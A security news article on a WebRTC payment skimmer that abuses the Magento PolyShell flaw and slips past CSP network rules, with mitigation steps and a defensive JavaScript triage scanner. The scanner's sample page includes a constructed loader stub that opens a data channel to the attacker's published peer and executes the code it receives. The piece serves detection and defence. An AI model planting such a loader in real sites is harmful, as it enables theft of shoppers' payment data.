WebRTC Skimmer Bypasses CSP to Steal Payment Data from E-Commerce Sites
#Vulnerabilities


Security Reporter

A new payment skimmer uses WebRTC data channels to steal payment information from e-commerce sites, bypassing Content Security Policy (CSP) protections and leveraging the PolyShell vulnerability in Magento and Adobe Commerce platforms.

Cybersecurity researchers have uncovered a sophisticated new payment skimmer that leverages WebRTC data channels to steal payment information from e-commerce websites, marking a significant evolution in web-based financial fraud.

The PolyShell Vulnerability Connection

The attack exploits a recently discovered vulnerability called PolyShell, which affects both Magento Open Source and Adobe Commerce platforms. This critical flaw allows unauthenticated attackers to upload arbitrary executables via the REST API and achieve code execution on vulnerable systems.

Since March 19, 2026, PolyShell has been under mass exploitation, with over 50 IP addresses actively scanning for vulnerable targets. Security firm Sansec reports finding PolyShell attacks on 56.7% of all vulnerable stores, highlighting the widespread nature of this threat.

Adobe released a fix for PolyShell in version 2.4.9-beta1 on March 10, 2026, but this patch has not yet reached production versions of the software, leaving many sites exposed.

How the WebRTC Skimmer Works

The skimmer is an injected script that runs as soon as it loads. It opens a WebRTC peer connection (RTCPeerConnection) to a hard-coded peer at 202.181.177.177 on UDP port 3479, and over the resulting data channel it retrieves JavaScript that is then injected into the checkout page to capture payment details.

What makes this attack particularly concerning is that it sidesteps Content Security Policy (CSP). CSP's network directives (connect-src and the default-src fallback) govern fetch, XMLHttpRequest and WebSocket, but not RTCPeerConnection, so a policy that blocks every unauthorized HTTP connection does nothing to stop a data channel to an attacker-chosen peer. CSP still governs how the retrieved code is run: a script-src without 'unsafe-eval' or 'unsafe-inline' blocks eval, new Function and injected inline script, so what is bypassed is the network restriction, not the whole policy.

Why WebRTC Makes Detection Harder

WebRTC data channels carry SCTP over DTLS over UDP rather than HTTP, so network security tools that inspect HTTP traffic never see the stolen data. The CSP gap is a separate issue: CSP does not govern peer connections at all, which is why even stores with strict policies remain open to this kind of exfiltration.

Sansec notes that "A store with a strict CSP that blocks all unauthorized HTTP connections is still wide open to WebRTC-based exfiltration." The traffic itself is also harder to detect, as WebRTC operates outside the scope of traditional web security monitoring.

Targeted Attack on Automotive E-Commerce

The skimmer was discovered during an investigation of a car manufacturer's e-commerce website, demonstrating that even high-profile, presumably well-secured sites remain vulnerable to these advanced attacks.

Mitigation Strategies

Site owners are advised to take several protective measures:

  • Block access to the "pub/media/custom_options/" directory
  • Scan stores for web shells, backdoors, and other malware
  • Monitor for unusual outbound UDP traffic, in particular to 202.181.177.177 on port 3479, the peer hard-coded in this skimmer
  • Apply available patches as soon as they reach production versions
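The mechanics described above (a peer connection to a hard-coded address, second-stage code pulled over the data channel, CSP blind to the connection) and the advice to scan stores for injected code can be turned into a first-pass triage check. The following is an added example written for this article, not the skimmer's code and not Sansec's tooling: it pulls the script tags out of a page, flags WebRTC API use and any ICE candidate naming a literal peer, notes whether the same script contains an eval-style sink, and parses the page's CSP to show that connect-src gives no coverage while script-src still decides whether retrieved code can execute. The sample HTML, CSP and SDP are constructed for the example; only the peer address and port are taken from the article.

```javascript
// Added example (not the skimmer's code and not Sansec's tooling): static triage of a
// store page for WebRTC-based exfiltration indicators, plus a check of the page's CSP
// for the two things that matter here: whether the policy can stop a data channel at
// all (it cannot) and whether it would let retrieved code run via eval / inline script.

// WebRTC API surface a skimmer loader has to touch.
const WEBRTC_API = /\b(RTCPeerConnection|createDataChannel|setRemoteDescription|addIceCandidate)\b/g;
// An SDP ICE candidate line carrying a literal IPv4 address and port: a hard-coded peer
// shows up like this in the SDP the loader hands to setRemoteDescription.
const ICE_CANDIDATE = /candidate:\S+ \d+ udp \d+ (\d{1,3}(?:\.\d{1,3}){3}) (\d+) typ (host|srflx|relay)/gi;
// Sinks that would execute code pulled over the channel.
const EVAL_SINK = /\b(eval|new Function)\s*\(/;
// Peer address published for this campaign (from the article); extend with your own IOCs.
const KNOWN_IOCS = ['202.181.177.177'];

function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /src\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

function scanScript(body) {
  const apis = [...new Set(body.match(WEBRTC_API) || [])];
  const peers = [...body.matchAll(ICE_CANDIDATE)]
    .map(m => ({ ip: m[1], port: Number(m[2]), type: m[3] }));
  return { apis, peers, evalSink: EVAL_SINK.test(body) };
}

function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const [name, ...values] = part.trim().split(/\s+/);
    if (name) directives[name.toLowerCase()] = values;
  }
  return directives;
}

function assessCsp(header) {
  const d = parseCsp(header);
  const script = d['script-src'] || d['default-src'] || [];
  return {
    // connect-src / default-src govern fetch, XHR and WebSocket; RTCPeerConnection is
    // outside CSP's network directives, so no value of these makes the page "covered".
    webrtcCovered: false,
    allowsEval: script.includes("'unsafe-eval'"),
    allowsInline: script.includes("'unsafe-inline'"),
  };
}

function triagePage(html, cspHeader) {
  const findings = [];
  for (const s of extractScripts(html)) {
    const r = scanScript(s.body);
    if (r.apis.length === 0) continue; // no WebRTC use, nothing to report
    const ioc = r.peers.some(p => KNOWN_IOCS.includes(p.ip));
    findings.push({
      src: s.src, apis: r.apis, peers: r.peers, evalSink: r.evalSink,
      verdict: ioc ? 'known-ioc' : r.peers.length ? 'hard-coded-peer' : 'webrtc-usage',
    });
  }
  return { csp: assessCsp(cspHeader), findings };
}

// Constructed sample page: one ordinary script tag and one inline stand-in for an
// injected loader. The loader body and SDP are invented for this example; only the
// peer address and port come from the article.
const SAMPLE_HTML = `<html><body>
<script src="/static/frontend/Magento/luma/en_US/requirejs/require.js"></script>
<script>
  var pc = new RTCPeerConnection({ iceServers: [] });
  var ch = pc.createDataChannel("u");
  pc.setRemoteDescription({ type: "answer", sdp:
    "v=0\\r\\na=candidate:1 1 udp 2113937151 202.181.177.177 3479 typ host\\r\\n" });
  ch.onmessage = function (e) { (new Function(e.data))(); };
</script>
</body></html>`;
// Constructed CSP: strict on HTTP connections, yet it still lets inline script run.
const SAMPLE_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline'; connect-src 'self'";

console.log(JSON.stringify(triagePage(SAMPLE_HTML, SAMPLE_CSP), null, 2));
```

Run it with node. Real skimmers obfuscate identifiers, so treat a clean result from plain string matching as weak evidence and pair it with the server-side scan for web shells. The CSP assessment is also a reminder of where the policy still helps: nothing in CSP stops the channel, but a script-src without 'unsafe-inline' or 'unsafe-eval' stops the retrieved code from running through eval, new Function or an injected inline script tag, leaving the loader to act only on data it receives rather than on code.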

The Broader Implications

This attack represents a concerning trend in web-based financial fraud, where attackers continuously evolve their techniques to bypass existing security controls. The combination of a remote code execution vulnerability with a novel exfiltration method creates a potent threat that could affect thousands of e-commerce sites worldwide.

The use of WebRTC for malicious purposes demonstrates how legitimate web technologies can be repurposed for cybercrime, requiring security professionals to adapt their defensive strategies accordingly.

As e-commerce continues to grow, the stakes for protecting payment data become increasingly critical, making awareness of these evolving threats essential for both merchants and security practitioners.
